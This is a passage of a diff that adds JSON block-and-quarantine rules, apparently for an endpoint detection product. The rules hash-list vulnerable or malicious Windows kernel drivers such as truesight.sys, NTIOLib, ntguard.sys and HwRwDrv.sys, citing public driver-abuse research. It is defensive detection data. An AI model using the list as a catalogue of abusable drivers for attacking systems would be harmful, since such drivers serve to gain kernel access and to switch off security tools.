"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823394Z", + "creation_date": "2026-03-23T11:45:30.823398Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823407Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "97153fdb315e84580b49aeb66709c419979c26b3ded5f2b4142245c18548eeb1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "933144b2-4e34-5448-9eab-d57143439810", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160777Z", + "creation_date": "2026-03-23T11:45:31.160779Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160784Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "094476116a7905fb52057dbfdbb6e37a0a46da61123ac86faefe67b41f7edd7b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "933338b2-0b96-5640-916d-5d55fb1fc725", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817790Z", + "creation_date": "2026-03-23T11:45:31.817794Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817802Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0e28fd8e85a380cf4e6abc08cb7e0cb98649a96fa835f8d613bc7ca350e93505", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "933352f8-27af-5cf2-8223-1f6b1a8a63ba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:30.461239Z", + "creation_date": "2026-03-23T11:45:30.461242Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461251Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "103c1735b0ad3fc22070c3268580cd3fdbef0129a787dbc51bd5d36639515a8f", + "comment": "Vulnerable Kernel Driver (aka sfdrvx32.sys) [https://www.loldrivers.io/drivers/6c0c60f0-895d-428a-a8ae-e10390bceb12/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "933356d5-d044-5fff-a472-75966216d56c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606593Z", + "creation_date": "2026-03-23T11:45:29.606595Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606600Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bd2d79f3930dab33ec2851c16da7e3043dd819df1592d965ee9d52b91b44ea4c", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"933ca585-c379-5629-b4c7-616612d47581", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614822Z", + "creation_date": "2026-03-23T11:45:29.614824Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614829Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a9706e320179993dade519a83061477ace195daa1b788662825484813001f526", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "933dafec-878a-5763-a98a-fd81f3cc2e71", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620478Z", + "creation_date": "2026-03-23T11:45:29.620480Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.620486Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f88ebb633406a086d9cca6bc8b66a4ea940c5476529f9033a9e0463512a23a57", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "93420501-6efa-5945-aab5-966a810195ae", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471440Z", + "creation_date": "2026-03-23T11:45:30.471443Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471452Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0897935ff2e0e7cc23a036ec0791d587b4799a299c8d6d65f364a8bdff645760", + "comment": "Vulnerable Kernel Driver (aka tfbfs3ped.sys) [https://www.loldrivers.io/drivers/500e07cb-77c6-4e83-ae3f-73f70f1c10b5/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "934a8a7a-cce6-5942-854a-409a5e87dc18", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.471715Z", + "creation_date": "2026-03-23T11:45:31.471718Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.471728Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47d2122b487192f6b36f6bcb6b1ff8d3f5c5d2a0088918c88ff2abda965998a0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "935b54e9-353e-5786-9cd6-2df2e52cd2fe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.497725Z", + "creation_date": "2026-03-23T11:45:31.497728Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.497737Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"9470208b5df920296d2e006666d56010dc2281298ff9496d3049e6f5cce3301c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9375c93f-645a-5a0d-b7ae-6bdba5540681", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830546Z", + "creation_date": "2026-03-23T11:45:30.830548Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830553Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2e975e5164f58cd8a540406fd3af42e53ffab7fef8caa9b0c02b6ae45dc35b49", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "937b703e-2e84-5f79-b8c0-0a913c8eef8a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.142727Z", + "creation_date": "2026-03-23T11:45:32.142729Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.142735Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c71f2fc9b795c39a73c4dcdd3ad2b7e1204eec3e783d43e47dd72814d33739cd", + "comment": "Vulnerable IKARUS anti.virus Driver (aka ntguard.sys and ntguard_x64.sys) [https://www.greyhathacker.net/?p=995, https://www.exploit-db.com/exploits/43139] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "93876cc1-b785-53da-8156-ccef9d16df3e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604464Z", + "creation_date": "2026-03-23T11:45:29.604466Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604472Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f8aeb50a115b4d35f15f876eb1a6e5ee5f3a142de12eec50b6bdf81196ffbea4", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) 
[https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "93994cca-607b-5ef0-b432-9fa288fde46e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495707Z", + "creation_date": "2026-03-23T11:45:31.495709Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495714Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "92def912354238e7a5c2ad0184f27b4fbbba1b7d6a8741aa9677ce3bf13785d1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "93b266cc-084b-554f-8e3e-14e3fb27b0ca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826244Z", + "creation_date": 
"2026-03-23T11:45:30.826246Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826252Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fcc4501b82401f4c01f2b016a258cb7627660d1284ba870ec426e804eeb5d53e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "93b34222-eaaf-5c9f-9ab0-f823633e6aa0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820463Z", + "creation_date": "2026-03-23T11:45:31.820467Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820475Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8430d5a27a590697fe71308aff46f6fea1482ed110c55014c050642618f58214", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "93c08e85-33ba-5ce5-82e2-fb4ba445273f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822918Z", + "creation_date": "2026-03-23T11:45:31.822921Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822929Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "65972828f8ccff5b09940cf0336d0ca4b812222e53f1718d974d06bedfa074cf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "93c42949-b058-560e-8022-5e25fd5e3afd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976570Z", + "creation_date": "2026-03-23T11:45:29.976572Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976577Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "565733b6e6d8f7b9661f04a3b4f29372f5dec080512551204b92ac4916a144cb", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "93cd02e4-7528-581b-a8c4-f804497884ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473763Z", + "creation_date": "2026-03-23T11:45:31.473767Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.473777Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3d1e408acb91b4053ed463244bf095670e12cc28d0fee927a638451ae049fcdc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "93cd1e20-2585-5ce5-9a46-45ce6c7a93c9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829812Z", + "creation_date": "2026-03-23T11:45:31.829815Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829824Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ac9a215dc3bec6b9f987bae02fdb90f14ec3ef8a0490b48c40f5317691ee4898", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "93d0c301-7e70-58b0-93ce-0cb85870abac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835518Z", + "creation_date": "2026-03-23T11:45:30.835520Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835526Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0f38eb237a6e698b504a8763a6cb0223726b17807969a12bc6bd17f66057cd42", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "93e6eecd-85dc-5322-9ac2-a7b7d21654b7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985216Z", + "creation_date": "2026-03-23T11:45:29.985218Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985223Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6b11aa02ee9e5cb9b6d20aff4f548187f6095b63c5a6215c08b8c2ae69a7a62c", + "comment": "Dangerous Physmem Kernel Driver (aka HwRwDrv.Sys) [https://www.loldrivers.io/drivers/e4609b54-cb25-4433-a75a-7a17f43cec00/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "93f19e7d-1c83-5522-9e96-8d8c7802bbc3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833345Z", + "creation_date": "2026-03-23T11:45:30.833348Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833357Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c348b0d8d702748fa01443cc735b14de2ad65820f7218f9ffd02692d7eee626a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "93f3d45a-0b98-5d5c-8952-d5f790d719eb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832115Z", + "creation_date": "2026-03-23T11:45:30.832117Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832123Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5238c3912c3969d9a005e2525d501a55d177961529b29a54e4d97d235cc65913", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "93feb702-d1ab-54f5-a2e6-5e2b746d7468", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477432Z", + "creation_date": "2026-03-23T11:45:30.477435Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477444Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "83a1fabf782d5f041132d7c7281525f6610207b38f33ff3c5e44eb9444dd0cbc", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) 